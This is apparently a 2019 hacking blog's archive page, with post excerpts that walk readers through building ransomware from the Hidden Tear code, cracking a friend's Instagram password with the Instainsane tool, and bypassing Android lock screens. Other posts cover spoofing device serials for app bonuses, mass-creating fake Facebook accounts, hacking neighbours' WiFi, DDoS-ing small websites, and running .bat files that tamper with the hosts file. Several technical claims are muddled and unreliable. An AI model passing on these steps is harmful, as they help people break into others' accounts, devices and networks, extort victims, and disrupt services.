Posts

Showing posts from August, 2019

How to create your own Ransomware Free

Image
          Nowadays the attack of ransomware is increased considerably. Recently My one of my friend whose name is Mr. Aniruddha has come across a attack from ransomware and he was asked to pay the ransom in the form of bitcoin to regain his data.           But he refused to pay the ransom as it was too much and unfortunately he has to loose all his data as he formatted his PC to remove the ransomware. He was fortunate that his PC didn't content important files.           And from that incident I got the idea to create my own ransomware and here I am. Today I will show you how to create a free ransomware            Turkish security researcher named Utku Sen has created a fully functional Ransomware and posted ita code on open source code sharing website GitHub.           The Ransomware dubbed Hidden Tear , uses AES Encryption to lock down files before displaying a ransom message warning to get users to pay up.           The currently undetectable version of ra

Crack Instagram Passwords Using Instainsane

Image
Nowadays , Instagram is one of the most widely used social media applications. I am pretty confident that at least one of your friends or you are using it pretty much every day. Today I am going to show you how you can crack your friend's Instagram password using a script called Instainsane. Procedure:- Step 1:- Download Instainsane Unfortunately, Instainsane is not available built in Kali distribution, so we will have to download it from github. kali > git clone   github.com/thelinuxchoice/instainsane.git Now, we need to install it. Go to the directory where you cloned the github repository and run the "install.sh" bash script. kali > cd <path to directory> kali > chmod +x install.sh kali > ./install.sh Step 2:- Crack That Password! Finally the time to crack your friend's password is came . The only thing we are going to need now is your friend's Instagram username and you could al

These Four Lines Of Code Can Crash Anyone’s Smartphone And Computer

Image
There’s a notorious link being shared on social networking websites that can crash nearly all smartphones — all you have to do is just click on this link. Known as crashsafari.com (clicking on this will crash your browser), this link crashes your browser by overloading it with thousands of characters in the address bar each second. As a result, the phone memory exhausts and your device crashes. How does Crashsafari.com work? The website is running a small piece of JavaScript that creates a loop with the help of History API and crashes your device. The History API allows the websites to change the URL of the page without performing page refresh. Thanks For Reading If You Like This Information And Found It Useful Please Subscribe For Email Alerts           Feel Free To Ask Any Kind Of Help 

Find Out Who’s Tracking You Through Your Android

Image
Today in this virtual world, there are so many security issues like lots of viruses, malware, Trojans, and keyloggers that can influence our devices. Here I am going to mention few short codes that will help you find the settings of your phones and to find out either your messages or information are being tracked. Code 1:    *#21# This code helps you to find out whether your messages, calls, and other data are being diverted. Code 2:    *#62# If any of your friend tells you, that your number is saying no-service or no-answer, then you need to dial this code on your smartphone to find out where your calls, messages, and data are being redirected. Code 3:    ##002# This is a universal code to deactivate all call forwarding. This will immediately switch off all the redirections from your phone. Code 4:    *#06# This code is used to find the International Mobile Equipment Identifier (IMEI). This code will be  very useful to find the IMEI number
Image
Hello Friends Today I Am Going To Teach You, How To Change Serial Number Of Your Android Android Serial number of every mobile device is its identity to recognize that network on the cellular network and to recognize the licenses that had been made for that device and this identity is by default set by the maker of that device. You can’t change the IMEI number to detect over the cellular network but you can actually change this on your device for the temporary time for the apps and the devices licenses. And this actually fakes your device identity and you can use this in a very cool way of faking some recharge apps to get the bonus. And you can also change the IMEI number to its default also.   The method is so simple. All you need is just a rooted android device that will allow Xposed installer to run on the device. And after having Xposed installer you will have to use Xposed module app to change the Serial number of your android. Procedure:- Step 1:- You n

How To Hack Or Open Android Lock

Image
Nowadays , many people uses pattern lock or password lock to their mobiles . Sometimes your phone gets locked . And in such situation this tricks will help you a lot . METHOD 1:- Solution For Those Who Have Installed Recovery Modes Like Cwm, TWRP, XREC, Etc… Procedure:- Step 1:- Download the zip Pattern Password Disable on to your sdcard (Use your PC, as you cannot get into your phone) Step 2:- Now , Insert the sdcard into your phone Step 3:- Now , Reboot into recovery mode Step 4:- Flash the zip Step 5:- Then , Reboot Step 6:- Done ! There You Go. Note:- If You See The Gesture Pattern Grid Or Password After Restarting, Don’t Worry. Just Try Any Random Pattern Or Password And it Should Unlock. METHOD 2:- Solution For Everyone Without Recovery Installed – ADB: What You Will Need:- 1. A computer running a Linux distro or Windows+Cygwin 2. An USB cable to connect your phone to the PC 3. ADB

Trick To Create Unlimited Verified Facebook Accounts

Image
Hello friends , many of you might have come across a situation where you want to create a facebook account but don't want to provide the authentic mail id . So here I am with a trick with the help of which you can do the same .  Step 1:- First of all , go to http://m.facebook.com and then click on “Create New Account” Step 2:- Fill the complete form ( Use http://fakenamegenerator.com/ ) In the section of “Email or Phone” use email id you got from http://10minutemail.com/ Step 3:- Press “Sign up” and then visit http://10minutemail.com/ to get email verification from Facebook ( Press F5 until you see it ) use that OTP CODE to activate your account. Step 4:- That's it your account will be created . Now provide all information like school, work details, etc. NOTE:- Your Account can be banned within a day, so do make sure that you are providing the proper identity (college, school, place of living…) and don’t forget to upload a pr

Hack WiFi Password Using Command Prompt

Image
Hello friends , today I am going to teach you how to hack WiFi password using command prompt . You can try these trick on your neighbours or friends. Sometimes this trick doesn’t works with some WiFi because of upgraded hardware. But still you can try this trick on WiFi having old hardware . Types Of WiFi Encryptions  1: WEP stands for Wired Equivalent Privacy which is one of the widely used security key in WiFi devices. This key was added in 1999 and it is also the oldest and most popular key. WEP uses 128 bit and 256-bit type of encryption. With the help of today’s trick , you can easily crack 128-bit encryption and Hack WiFi password using Command Prompt . 2: WAP and WAP2 : Wi-Fi Protected Access is an another version of WiFi encryption and it was launched in 2003. It uses 256-bit type of encryption model and it is tough to hack it. WAP2 is the updated version of WAP and was firstly used in 2006. Nowadays WAP has been replaced by WPA2 . Procedure Step 1:-

How To Hack A Website Using DDos Attack

Image
Hello friends , n owadays it is very common news when you come to know that a website is hacked or a website is crashed and etc. etc. Have you ever wondered that how a hacker or group of hackers take a website down or do you know the exact method of crashing a website? Actually, there are numerous methods which are used by hackers . However, using DDos Attack technology, any small website can be crashed very easily  .  Today I am going to tell you how you can hack any small website temporarily .  SO FIRST OF ALL WHAT IS DDos DDos stands for “Distributed Denial of Service Attack“. This tutorial explains what is DDosing and how you can hack a website temporarily using DDos method. HOW TO DDOS A WEBSITE MANUALLY USING WINDOWS COMMAND PROMPT :  Step 1:- First of all find your prey I mean select a small website that you want to DDos attack.  Step 2:- Now find the IP address of that website.   To find the IP address of a specific website j

Some Of Most DANGEROUS .bat files

Image
Some of these codes are very dangerous! USE THIS AT YOUR OWN RISK. Block Google. Code:- @echo off ::--------Block Google-------:: cd "C:\Windows\System32\Drivers\etc" echo 127.0.0.1 google.com >> "Hosts" echo 127.0.0.1 http://www.google.com >> "Hosts" ::---------------------------:: Block Hotmail. Code:- @echo off ::--------Block Hotmail------:: cd "C:\Windows\System32\Drivers\etc" echo 127.0.0.1 hotmail.com >> "Hosts" echo 127.0.0.1 http://www.hotmail.com >> "Hosts" ::---------------------------:: Block MSN. Code:- @echo off ::---------Block MSN---------:: cd "C:\Windows\System32\Drivers\etc" echo 127.0.0.1 msn.com >> "Hosts" echo 127.0.0.1 http://www.msn.com >> "Hosts" ::---------------------------:: Block wikipedia. Code:- @echo off ::-------Block Wikipedia-----::